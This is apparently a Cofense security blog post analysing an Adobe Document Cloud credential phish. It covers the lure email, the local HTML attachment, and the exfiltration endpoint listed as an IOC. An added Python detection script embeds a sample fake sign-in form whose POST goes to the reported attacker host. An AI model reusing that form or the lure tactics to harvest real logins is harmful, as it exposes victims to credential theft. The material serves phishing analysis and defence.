
By Zachary Bailey, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has seen a rise in threat actors impersonating common document-sharing services to harvest credentials. These attacks can also use legitimate services to host malicious documents that are delivered to an unsuspecting employee who trusts the domain where they are hosted.

Some of these attacks do not need to spoof the sender, such as this Adobe phish (Figure 1) that was found in a Proofpoint environment. The email appears merely to include a purchase order with encryption via the Adobe Document Cloud. In the email, Adobe is just one of several components of the phish. It builds credibility by posing as a government agency and suggests that the recipient can sign into Adobe to decrypt the file – or download Acrobat Reader to view it instead.

Figure 1: Email Body 

This email appears to be a forwarded message, as though the recipient is expecting it: the subject is “FW: Purchase Order 3500250780” and also includes the name of the organization sending the PO. A common tactic used by threat actors is to create a fake reply chain by inserting “RE” or “FW” into the subject line to trick the recipient into thinking it is a response to a conversation they initiated or were involved in.

Even though the address is clearly from a Gmail domain, it is not an uncommon practice for work-related emails to be shared between personal and corporate accounts.  

The email is rather informative, listing the correct postal address and contact information for the government office it is impersonating. As mentioned earlier, the email body says, “To read it you sign into Adobe Document Cloud or download the latest Adobe Acrobat Reader.” Recipients are not urged to sign in but are presented with an alternative option that would not put their credentials at risk. The only urgency is regarding “with immediate effect please ensure all invoices are addressed as below”, but that is legitimate information regarding how to address the invoice.

If the recipient chooses to sign into the Adobe Document Cloud, they will immediately open the document which then launches in their default web browser. This HTML file will pull its resources from Adobe’s website while the pop-up message in Figure 2 delays the victim from seeing the page. JavaScript is embedded in the page to enforce basic password guidelines, which increases the odds that a realistic password is entered into the form. After the user attempts to log on, the HTML file will also send out a POST request with their login information to the threat actor.

Figure 2: Step 1 of Attack 

When the document is inspected by the recipient, its contents are not immediately apparent. A popup message covers the assets as they load and must be read before proceeding. This is not hosted on a website, so checking the URL will not immediately tip off users that something is amiss. To them, they are just viewing a file on their computer. The wording of the popup is “This document is electronically encrypted to the receiver’s email”, which is a strange way of saying that the document can only be unlocked by the recipient. If a user is not familiar with technical terms, it could still sound legitimate to them, but that should be the first hint something is amiss. The second part of the popup urges them to sign in with “authenticated email credentials”, an even more noticeable tip-off that this form wants their login information.

Figure 3: Step 2 of Attack 

After the user clicks through to access the login page, a full webpage appears that looks like the Adobe Document Cloud site. This is still occurring inside the downloaded document, and the only way to analyze where the form is from – without pressing “sign in” – is to inspect the code itself. To verify where the login information is going, we pulled up the network traffic and sent a request through. Our information is now going to “infiniteworks[.]net/IDI/high.php”, which is not part of Adobe.
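Inspecting the attachment's code without submitting the form can be scripted. The following added example (not part of the original post or of any Cofense tooling) parses an HTML attachment with Python's standard library, records where its assets load from and where its forms and inline scripts send data, and flags any submission host that is not under the impersonated brand's domain. The sample HTML is constructed; the form action is the host reported in the post's IOC table and is never contacted.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains the lure claims to belong to; this post's attachment poses as Adobe Document Cloud.
EXPECTED_DOMAINS = ("adobe.com",)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")

# Constructed sample attachment: assets load from Adobe, but the sign-in form posts to the
# third-party host from the post's IOC table. Nothing here is ever fetched or contacted.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="https://documentcloud.adobe.com/assets/style.css">
<script>function check(f){ return f.password.value.length >= 8; }</script></head>
<body><img src="https://www.adobe.com/img/logo.svg">
<form method="POST" action="https://infiniteworks.net/IDI/high.php" onsubmit="return check(this)">
<input type="email" name="email"><input type="password" name="password">
<input type="submit" value="Sign in"></form></body></html>"""

class AttachmentParser(HTMLParser):
    """Collects asset hosts, form submission hosts, inline script text and password fields."""
    def __init__(self):
        super().__init__()
        self.asset_hosts, self.submit_hosts, self.script_text = [], [], []
        self.has_password_field, self._in_script = False, False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.submit_hosts.append(urlparse(a["action"]).hostname)
        elif tag in ("img", "link", "script") and (a.get("src") or a.get("href")):
            self.asset_hosts.append(urlparse(a.get("src") or a.get("href")).hostname)
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.has_password_field = True
        self._in_script = tag == "script"
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):  # inline JavaScript often holds the real fetch/XHR target
        if self._in_script:
            self.script_text.append(data)

def analyze(html):
    """Return where the attachment sends credentials; hosts outside EXPECTED_DOMAINS are flagged."""
    p = AttachmentParser()
    p.feed(html)
    p.submit_hosts += [urlparse(u).hostname for u in URL_RE.findall("".join(p.script_text))]
    foreign = sorted({h for h in p.submit_hosts
                      if h and not any(h == d or h.endswith("." + d) for d in EXPECTED_DOMAINS)})
    return {"password_form": p.has_password_field,
            "asset_hosts": sorted({h for h in p.asset_hosts if h}),
            "foreign_submit_hosts": foreign,
            "verdict": "credential phish" if p.has_password_field and foreign else "no finding"}
```

Run `analyze(open("attachment.html").read())` on a quarantined attachment; a password field combined with a foreign submission host is the pattern this post describes, while Adobe-hosted assets alone prove nothing.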

Figure 4: Final Redirect of Phish  

After exposing their Adobe account credentials to the attacker, the victim is redirected to a new webpage. If they check the URL again, they will discover that they are now on the actual Adobe website. With no document having been decrypted, they should be fully aware that something is wrong. They should alert their security team immediately.

Indicators of Compromise 

Network IOC                                  IP
hXXps://infiniteworks[.]net/IDI/high.php     70[.]40[.]220[.]123

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.  
  
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.